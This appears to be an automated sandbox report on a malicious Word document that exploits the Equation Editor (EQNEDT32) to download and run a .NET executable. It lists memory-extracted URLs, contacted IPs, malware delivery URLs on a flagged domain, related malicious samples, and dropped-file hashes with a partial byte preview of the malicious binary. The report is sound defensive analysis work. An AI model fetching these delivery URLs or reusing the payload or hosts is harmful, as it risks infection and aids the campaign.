http://www.chambersign.Q	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ca.sia.it/seccli/repository/CPS0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.infonotary.com/cps/qcps.html0$	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.post.trust.ie/reposit/cps.html0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://etNSag.com	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.infonotary.com/responder.cgi0V	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sk.ee/cps/0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.valicert.com/1	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2151415569.00000000054C0000.00000002.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2408242367.0000000005F20000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.globaltrust.info0=	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2147145262.0000000002171000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	RegAsmbvbvcrtyjgh.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409603554.0000000007C50000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://cps.chambersign.org/cps/chambersignroot.html0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ssc.lt/cps03	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.gva.es0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://DynDns.comDynDNS	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ancert.com/cps0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.sia.it/seccli/repository/CRL.der0J	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false		high
http://mail.privateemail.com	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404557790.0000000002647000.00000004.00000001.sdmp	false		high
http://www.crc.bg0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.entrust.net/CRL/Client1.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegAsmbvbvcrtyjgh.exe, 00000004.00000002.2151415569.00000000054C0000.00000002.00000001.sdmp, RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2408242367.0000000005F20000.00000002.00000001.sdmp	false		high
http://www.disig.sk/ca0f	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false		high
http://tempuri.org/ConsultationReport.xsd	RegAsmbvbvcrtyjgh.exe, RegAsmbvbvcrtyjgh.exe, 00000007.00000000.2145847246.0000000000A52000.00000020.00020000.sdmp, hEeIyOK.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://www.sk.ee/juur/crl/0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chambersign.org/chambersignroot.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pki.gva.es/cps0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false		high
http://www.pki.gva.es/cps0%	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false		high
http://www.wellsfargo.com/certpolicy0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2406565560.00000000059C0000.00000004.00000001.sdmp	false		high
http://www.e-trust.be/CPS/QNcerts	RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2409509094.0000000007810000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.252.37.193	unknown	Malaysia		45144	NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	true
198.54.122.60	unknown	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	349752
Start date:	08.02.2021
Start time:	06:38:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INQUIRY_RFQ_20210208.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@8/15@10/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1%) Quality average: 47.1% Quality standard deviation: 35.2%
HCA Information:	Successful, ratio: 92% Number of executed functions: 47 Number of non-executed functions: 6
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 67.26.73.254, 8.248.141.254, 67.27.159.254, 67.27.158.126, 67.26.81.254 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:38:35	API Interceptor	511x Sleep call for process: EQNEDT32.EXE modified
06:39:05	API Interceptor	1353x Sleep call for process: RegAsmbvbvcrtyjgh.exe modified
06:39:07	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.252.37.193	Request- NAVALTECH.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/zic/KlalU0GjxacVNEE.exe
	Quotation-20441.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
	New ORDER 092134..doc	Get hash	malicious	Browse	globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
	RFQ A50924-E001.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/zi/SAM.exe
	quotation085312456.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/pll/PALLS.exe
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/ja/JASP.exe
198.54.122.60	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse
	veHKklzK74heP6u.exe	Get hash	malicious	Browse
	Inquiry_0197832.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse
	U2LameOT02.exe	Get hash	malicious	Browse
	Request- NAVALTECH.doc	Get hash	malicious	Browse
	Quotation-20441.doc	Get hash	malicious	Browse
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse
	New ORDER 092134..doc	Get hash	malicious	Browse
	i0K5YoZXLi.exe	Get hash	malicious	Browse
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse
	DHL............097HFRGJLK0877IKF.xlsx	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
globalteamacademy.com	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
mail.privateemail.com	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	veHKklzK74heP6u.exe	Get hash	malicious	Browse	198.54.122.60
	Inquiry_0197832.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse	198.54.122.60
	U2LameOT02.exe	Get hash	malicious	Browse	198.54.122.60
	Request- NAVALTECH.doc	Get hash	malicious	Browse	198.54.122.60
	Quotation-20441.doc	Get hash	malicious	Browse	198.54.122.60
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	198.54.122.60
	New ORDER 092134..doc	Get hash	malicious	Browse	198.54.122.60
	i0K5YoZXLi.exe	Get hash	malicious	Browse	198.54.122.60
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	198.54.122.60
	ORDER-876545.exe	Get hash	malicious	Browse	198.54.122.60

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	INV411422.xls	Get hash	malicious	Browse	198.54.120.71
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	#U260e#Ufe0fmsg0091January_report_2021.HTM	Get hash	malicious	Browse	198.54.115.249
	N4GjPirQhmtozOW.exe	Get hash	malicious	Browse	199.193.7.228
	veHKklzK74heP6u.exe	Get hash	malicious	Browse	198.54.122.60
	Inquiry_0197832.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse	198.54.122.60
	ztx85QLpZB.exe	Get hash	malicious	Browse	199.188.200.97
	U2LameOT02.exe	Get hash	malicious	Browse	198.54.122.60
	#U260e#Ufe0fmsg0100February_report_2021.HTM	Get hash	malicious	Browse	198.54.115.249
	GIuEtCOYbL.exe	Get hash	malicious	Browse	199.193.7.228
	Remittance Advice.xls	Get hash	malicious	Browse	198.54.116.24
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
	PAYMENT 25SW Aug-06-2018.doc	Get hash	malicious	Browse	182.239.42.250

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.06435847836333
Encrypted:	false
SSDEEP:	6:kKGwpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Oww3kPlE99SNxAhUeo+aKt
MD5:	B0694681DA340DF45D71C2C379F883D9
SHA1:	64CF40997F78B9124C8D9644E537AA94255B9884
SHA-256:	7D751853ECE589CCFC0586DCE26EF3259103332684A071AF9271EEC799ED2D81
SHA-512:	640D5A0211B8F4FEB4B53AFCD00267D40477C9F6071EC446C6DA998A39C1D4FB7670CB10CD55E993A1C0843E1DA6BF2639A1440D05E0910CB0A9B3E12BC292CF
Malicious:	false
Reputation:	low
Preview:	p...... ........../.4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1377280
Entropy (8bit):	6.244809260486293
Encrypted:	false
SSDEEP:	12288:sSqJajjiOqNXUbOIGm1XeoUGWZHnHHxGxrYvb8j4QjY2lQXKp07:5jiOLhXgRGxv/
MD5:	4A8EB2631D91AD206D94D22179C54C0E
SHA1:	E093FA42CD5AE5BCFA1CF04E300FAE5C44991AB0
SHA-256:	BC88C73FDA9A2EF51F979D2368A1039A04A0CE8199DC46B9F992A9FFACF58D8C
SHA-512:	81C6EFC4B5CC463D80B83ADA19E64E7802E25A6E88776CDCFFB47425CC000352267C9B0CA558D9C1C6124CF6CF07911701E32ECFE8F92C1AFB654B554AD9027D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Reputation:	low
IE Cache URL:	http://globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[ `............................N.... ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H.......8...................(............................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BFC4F63-025D-4403-9DBE-B492A11253DC}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A3DB071-4F03-4D2B-8C5C-F1ADB9722678}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	1.3877376031257593
Encrypted:	false
SSDEEP:	6:zVF2FEGLEW/PEGLEW1uFEGLEW/PEGLEWwNNgREqAWlgFJQ/jlll8vlw2FrA:hFJLWELWbLWELWGk5uFJQbuvq2ZA
MD5:	666FC37511017CB53852D63C0D5AE0B2
SHA1:	EE986026E17B98C1F4A6E256344205925D51A40A
SHA-256:	797E8E91C45FCEF6FCBF729DD97AA80DE61C66B6E19F535855A96EB6D50F9B6C
SHA-512:	FE2AC744C3D8702EB474C719FC28C94F145A5FD8C7CAF1B8569E290DF0B472844F0CDAD11F0DD3DD5F46F7AB8BC97F8CB8F0B663DACBAC954FA0608F4B974A57
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . . . . . . . . . . . . . . . .8.3.4.1.9.2.1.8._.7.7.1.1.6.5.9.8.6.2.6.5.8.3.7.7.1.1.6.5.9.8.6.2.6.5.8.3. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._.7.7.1.1.6.5.9.8.6.2.6.5.8.3.7.7.1.1.6.5.9.8.6.2.6.5.8.3.:.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Local\Temp\Cab21D5.tmp Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar21D6.tmp Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	data
Category:	modified
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
